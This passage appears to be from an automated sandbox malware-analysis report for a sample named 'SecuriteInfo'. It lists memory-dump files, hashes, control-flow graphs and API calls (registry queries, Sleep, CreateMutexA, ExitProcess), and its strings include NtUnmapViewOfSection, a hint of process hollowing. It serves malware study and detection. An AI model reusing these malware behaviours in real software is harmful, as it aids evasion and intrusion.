                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: $($NtUnmapViewOfSection$VUUU$h R$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                      • API String ID: 3677997916-1724677387
                                                                                                      • Opcode ID: dc8b497b55b61101f4a0aea0fb15ac8b4a450b688fda9c049ffd3c4fc66d0b83
                                                                                                      • Instruction ID: 83a3f901fdb2692660be7f7888a981d775a93001dae975782d73dc4fde6ada67
                                                                                                      • Opcode Fuzzy Hash: dc8b497b55b61101f4a0aea0fb15ac8b4a450b688fda9c049ffd3c4fc66d0b83
                                                                                                      • Instruction Fuzzy Hash: A6A233B1A002189BDF18DF68DC85BEEB7B5EF84304F109268F915B7281DB719AC4CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E47BBB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,?,00E47BBA,?,?,?,?,?,00E48C0E), ref: 00E47BF7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 524594d306df9b73e4ea0fc422842438a927f896b8823ec7ed206c7b66e0e208
                                                                                                      • Instruction ID: 0c9ea6f486a2ac776be53b8df4998be59f2c67318764158ba079fe94937bde3f
                                                                                                      • Opcode Fuzzy Hash: 524594d306df9b73e4ea0fc422842438a927f896b8823ec7ed206c7b66e0e208
                                                                                                      • Instruction Fuzzy Hash: 86E086301445086FCF397B18D85CD583B9EEB51390F015814F94466221CB35DD41C980
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660C66 Relevance: .1, Instructions: 141COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 64c39a6fae8e2a4a6cf1b476b88cc56ce5b8297e871c9345a7f6028d495c92e4
                                                                                                      • Instruction ID: e4fe7c8f7074a655f3b7505f5890f7004faa7d6a8c618d69bdfefebf2b975cf5
                                                                                                      • Opcode Fuzzy Hash: 64c39a6fae8e2a4a6cf1b476b88cc56ce5b8297e871c9345a7f6028d495c92e4
                                                                                                      • Instruction Fuzzy Hash: E92199EF14D1207D7042C1866F68EF767AEE5D6730331C537F807D5946E2991A4EA132
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E15D40 Relevance: 3.3, APIs: 2, Instructions: 311COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 382 e15d40-e15e0c call e15a70 call e15b10 call e14ad0 390 e15e36-e15e3c 382->390 391 e15e0e-e15e1a 382->391 392 e15e66-e15e81 call e2e681 390->392 393 e15e3e-e15e4a 390->393 394 e15e2c-e15e33 call e2ecf8 391->394 395 e15e1c-e15e2a 391->395 398 e15e5c-e15e63 call e2ecf8 393->398 399 e15e4c-e15e5a 393->399 394->390 395->394 396 e15e82 call e482fa 395->396 402 e15e87-e15f15 call e482fa call e45780 RegOpenKeyExA 396->402 398->392 399->398 399->402 412 e15f41-e15f64 RegCloseKey 402->412 413 e15f17-e15f40 RegQueryValueExA 402->413 414 e15f67-e15f6c 412->414 413->412 414->414 415 e15f6e-e15f85 call e29750 414->415 418 e15f87-e15f93 415->418 419 e15faf-e15fc7 415->419 422 e15fa5-e15fac call e2ecf8 418->422 423 e15f95-e15fa3 418->423 420 e15ff1-e1600c call e2e681 419->420 421 e15fc9-e15fd5 419->421 424 e15fe7-e15fee call e2ecf8 421->424 425 e15fd7-e15fe5 421->425 422->419 423->422 427 e1600d-e1605b call e482fa 423->427 424->420 425->424 425->427 436 e16087-e16096 427->436 437 e1605d-e16086 427->437 440 e160c4-e160dc 436->440 441 e16098-e160a4 436->441 437->436 444 e16106-e1611e 440->444 445 e160de-e160ea 440->445 442 e160a6-e160b4 441->442 443 e160ba-e160c1 call e2ecf8 441->443 442->443 446 e16156-e16238 call e482fa call e29090 call e15d40 442->446 443->440 450 e16120-e1612c 444->450 451 e16148-e16155 call e2e681 444->451 448 e160fc-e16103 call e2ecf8 445->448 449 e160ec-e160fa 445->449 470 e1623a 446->470 471 e1623c-e1625b call e121c0 446->471 448->444 449->446 449->448 452 e1613e-e16145 call e2ecf8 450->452 453 e1612e-e1613c 450->453 452->451 453->446 453->452 470->471 474 e1625d-e1626c 471->474 475 e1628c-e16292 471->475 476 e16282-e16289 call e2ecf8 474->476 477 e1626e-e1627c 474->477 478 e16295-e1629a 475->478 476->475 477->476 479 e164b7 call e482fa 477->479 478->478 481 e1629c-e162c4 call e29090 call e15d40 478->481 486 e164bc call e482fa 479->486 491 e162c6 481->491 492 e162c8-e162e9 call e121c0 481->492 490 e164c1-e16542 call e482fa 486->490 497 e16548 490->497 498 e1682a-e1683e 490->498 491->492 501 e162eb-e162fa 492->501 502 e1631a-e1632e 492->502 503 e16550-e16564 497->503 499 e168e3 call e29890 498->499 500 e16844-e16869 call e29750 498->500 510 e168e8-e16a19 call e482fa call e2a170 call e29750 499->510 516 e16893-e16899 500->516 517 e1686b-e16877 500->517 506 e16310-e16317 call e2ecf8 501->506 507 e162fc-e1630a 501->507 514 e16334-e1633a 502->514 515 e163d8-e163fc 502->515 503->499 508 e1656a-e165b4 call e29750 call e2ab00 503->508 506->502 507->486 507->506 536 e166e9-e16703 508->536 537 e165ba-e165d7 call e2ab00 508->537 601 e16a4b-e16a5d 510->601 602 e16a1b-e16a21 510->602 521 e16340-e1636d call e29090 call e15d40 514->521 522 e16400-e16405 515->522 526 e168c3-e168e2 call e2e681 516->526 527 e1689b-e168a7 516->527 523 e16889-e16890 call e2ecf8 517->523 524 e16879-e16887 517->524 570 e16371-e16398 call e121c0 521->570 571 e1636f 521->571 522->522 530 e16407-e1646c call e29750 * 2 522->530 523->516 524->510 524->523 533 e168b9-e168c0 call e2ecf8 527->533 534 e168a9-e168b7 527->534 563 e16499-e164b6 call e2e681 530->563 564 e1646e-e1647d 530->564 533->526 534->510 534->533 536->499 548 e16709-e16765 call e29750 call e2a910 536->548 537->536 555 e165dd-e165fa call e2ab00 537->555 575 e16767-e16773 548->575 576 e1679c-e167af 548->576 555->536 578 e16600-e1661d call e2ab00 555->578 572 e1648f-e16496 call e2ecf8 564->572 573 e1647f-e1648d 564->573 594 e163c9-e163cc 570->594 595 e1639a-e163a9 570->595 571->570 572->563 573->490 573->572 581 e16775-e16783 575->581 582 e16789-e16797 call e2ecf8 575->582 584 e167b1-e167bd 576->584 585 e167dd-e167e4 576->585 578->536 603 e16623-e16640 call e2ab00 578->603 581->510 581->582 582->576 591 e167d3-e167da call e2ecf8 584->591 592 e167bf-e167cd 584->592 596 e167e6-e167ef 585->596 597 e1680f-e1681b 585->597 591->585 592->510 592->591 594->521 598 e163d2 594->598 605 e163ab-e163b9 595->605 606 e163bf-e163c6 call e2ecf8 595->606 607 e167f1-e167ff 596->607 608 e16805-e1680c call e2ecf8 596->608 597->503 599 e16821-e16827 597->599 598->515 599->498 602->601 610 e16a23-e16a2f 602->610 603->536 621 e16646-e16663 call e2ab00 603->621 605->479 605->606 606->594 607->510 607->608 608->597 616 e16a41-e16a48 call e2ecf8 610->616 617 e16a31-e16a3f 610->617 616->601 617->616 619 e16a5e-e16a63 call e482fa 617->619 621->536 627 e16669-e16686 call e2ab00 621->627 627->536 630 e16688-e166a5 call e2ab00 627->630 630->536 633 e166a7-e166c4 call e2ab00 630->633 633->536 636 e166c6-e166e3 call e2ab00 633->636 636->536 636->585
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7ad5f52a3581543b6fde127be6c5fe5150a530659fd149bdb814c1481e492801
                                                                                                      • Instruction ID: 878299c52bcbf52877c2baa77fba12d584bbc00bbff8136953d453587cdfb8b6
                                                                                                      • Opcode Fuzzy Hash: 7ad5f52a3581543b6fde127be6c5fe5150a530659fd149bdb814c1481e492801
                                                                                                      • Instruction Fuzzy Hash: 19B103B1A0021CABDF24DF14CC85BDEBBB9EB44304F504669E919A7281DB749AC4CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19675 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 639 e19675-e19695 643 e196c3-e196df 639->643 644 e19697-e196a3 639->644 647 e196e1-e196ed 643->647 648 e1970d-e1972c 643->648 645 e196a5-e196b3 644->645 646 e196b9-e196c0 call e2ecf8 644->646 645->646 651 e1a3ec 645->651 646->643 653 e19703-e1970a call e2ecf8 647->653 654 e196ef-e196fd 647->654 649 e1975a-e1a3e6 call e29750 648->649 650 e1972e-e1973a 648->650 656 e19750-e19757 call e2ecf8 650->656 657 e1973c-e1974a 650->657 659 e1a423-e1a466 Sleep CreateMutexA 651->659 660 e1a3ec call e482fa 651->660 653->648 654->651 654->653 656->649 657->651 657->656 660->659
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
